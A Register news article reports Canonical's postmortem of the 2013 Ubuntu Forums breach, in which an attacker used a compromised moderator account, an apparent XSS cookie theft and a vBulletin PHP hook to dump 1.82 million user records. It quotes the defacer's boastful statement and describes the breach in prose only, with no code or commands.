Feeds

Ubuntu puts forums back online, reveals autopsy of a brag hacker

Canonical hardens security, shows Sputn1k_ only wolfed down useless salted hash

Combat fraud and increase customer satisfaction

Ubuntu Forums are back to normal following a serious hack attack that exposed the usernames, email addresses and hashed passwords of 1.8 million open source users.

Parent firm Canonical restored the forums on Tuesday as well as publishing a detailed summary of what went wrong and the broad steps it has taken to beef up security.

Canonical blames the breach on a "combination of a compromised individual accounts and the configuration settings in vBulletin, the Forums application software".

Only the forums and not the popular Ubuntu Linux distribution nor any Canonical or Ubuntu services, namely Ubuntu One and Launchpad, were affected. "We have repaired and hardened the Ubuntu Forums, and as the problematic settings are the default behaviour in vBulletin, we are working with vBulletin staff to change and/or better document these settings," a statement by Canonical on its official blog explains.

The blog post goes on to give a blow-by-blow account of how the high-profile hack was carried out:

At 16:58 UTC on 14 July 2013, the attacker was able to log in to a moderator account owned by a member of the Ubuntu Community.

This moderator account had permissions to post announcements to the Forums. Announcements in vBulletin, the Forums software, may be allowed to contain unfiltered HTML and do so by default.

The attacker posted an announcement and then sent private messages to three Forum administrators (also members of the Ubuntu community) claiming that there was a server error on the announcement page and asking the Forum administrators to take a look.

One of the Forum administrators quickly looked at the announcement page, saw nothing wrong and replied to the private message from the attacker saying so. 31 seconds after the Forum administrator looked at the announcement page (and before the administrator even had time to reply to the private message), the attacker logged in as that Forum administrator.

Based on the above and conversations with the vBulletin support staff, we believe the attacker added an XSS attack in the announcement they posted which sent the cookies of any visitor to the page to the attacker.

Once the attacker gained administrator access in the Forums they were able to add a hook through the administrator control panel. Hooks in vBulletin are arbitrary PHP code which can be made to run on every page load. The attacker installed a hook allowing them to execute arbitrary PHP passed in a query string argument. They used this mechanism to explore the environment and also to upload and install two widely available PHP shell kits. The attacker used these shell kits to upload and run some custom PHP code to dump the ‘user’ table to a file on disk which they then downloaded.

The attacker returned on 20 July to upload the defacement page.

Canonical's postmortem of the attack concludes that the hacker(s) would have gained full access to the Forums database. This access was used to download the "user" table which contained usernames, email addresses and salted and hashed (using MD5) passwords for 1.82 million users.

The audit concludes that the hacker(s) was not able to gain any access to any other Canonical or Ubuntu services. The Ubuntu code repository and update mechanism were also beyond the reach of the hacker/s, the investigation concludes.

The open-source firm admits it hasn't yet gotten to the bottom of how the attacker gained access to the moderator account used to start the attack or what type of cross-site scripting attack was subsequently brought into play. "The announcement the attacker posted was deleted by one of the Forum administrators so we don’t know exactly what XSS attack was used," it said.

The initial compromise went unnoticed and it wasn't until the Ubuntu Forums were defaced on Saturday 20 July that the site was pulled offline. A Twitter user using the profile @Sputn1k_ subsequently claimed responsibility for the defacement.

Sputn1k_ subsequently said he hadn't planned to crack the stolen ubuntuforums.org credentials in a statement that suggested pure devilment and perhaps a desire to expose security flaws or gain bragging rights were behind the hack.

If I do get into a website, most of the time there's no REAL malicious intentions. Grab the database, leave a message. That's it. I don't like to over-do things. Might cause some downtime, but what if it WAS the "syr14n c3b3r 4rmy" (not that their brain-dead brains have the power to do anything whatsoever), and they did have malicious intentions, and they did leak the database and use it to their own advantage?

XSS (cross-site scripting) attacks are a common class of website vulnerability that allows (potentially malicious) content from a hacker-controlled site to be presented to surfers as if it came from a vulnerable site they are visiting. The ruse most often crops up in phishing attacks but it has other applications as well, as the Ubuntu Forums hack graphically illustrates.

Canonical's post goes on to provide a detailed description of steps it has taken to beef up its security and defend against future attacks.

The whole explanation is a model of openness and clarity that concludes with an apology about the data leak and downtime that came as a result of the breach.

Although users were inconvenienced by the breach - which left them without access to the forums for a week and obliged them to change their passwords - the restoration process was designed so that no data (posts, private messages etc) would be lost during the disaster recovery process. ®

High performance access to file storage

More from The Register

next story
This time it's 'Personal': new Office 365 sub covers just two devices
Redmond also brings Office into Google's back yard
Batten down the hatches, Ubuntu 14.04 LTS due in TWO DAYS
Admins dab straining server brows in advance of Trusty Tahr's long-term support landing
Microsoft lobs pre-release Windows Phone 8.1 at devs who dare
App makers can load it before anyone else, but if they do they're stuck with it
Half of Twitter's 'active users' are SILENT STALKERS
Nearly 50% have NEVER tweeted a word
Internet-of-stuff startup dumps NoSQL for ... SQL?
NoSQL taste great at first but lacks proper nutrients, says startup cloud whiz
Windows 8.1, which you probably haven't upgraded to yet, ALREADY OBSOLETE
Pre-Update versions of new Windows version will no longer support patches
Microsoft TIER SMEAR changes app prices whether devs ask or not
Some go up, some go down, Redmond goes silent
Red Hat to ship RHEL 7 release candidate with a taste of container tech
Grab 'near-final' version of next Enterprise Linux next week
Ditch the sync, paddle in the Streem: Upstart offers syncless sharing
Upload, delete and carry on sharing afterwards?
prev story

Whitepapers

Designing a defence for mobile apps
In this whitepaper learn the various considerations for defending mobile applications; from the mobile application architecture itself to the myriad testing technologies needed to properly assess mobile applications risk.
3 Big data security analytics techniques
Applying these Big Data security analytics techniques can help you make your business safer by detecting attacks early, before significant damage is done.
Five 3D headsets to be won!
We were so impressed by the Durovis Dive headset we’ve asked the company to give some away to Reg readers.
The benefits of software based PBX
Why you should break free from your proprietary PBX and how to leverage your existing server hardware.
Securing web applications made simple and scalable
In this whitepaper learn how automated security testing can provide a simple and scalable way to protect your web applications.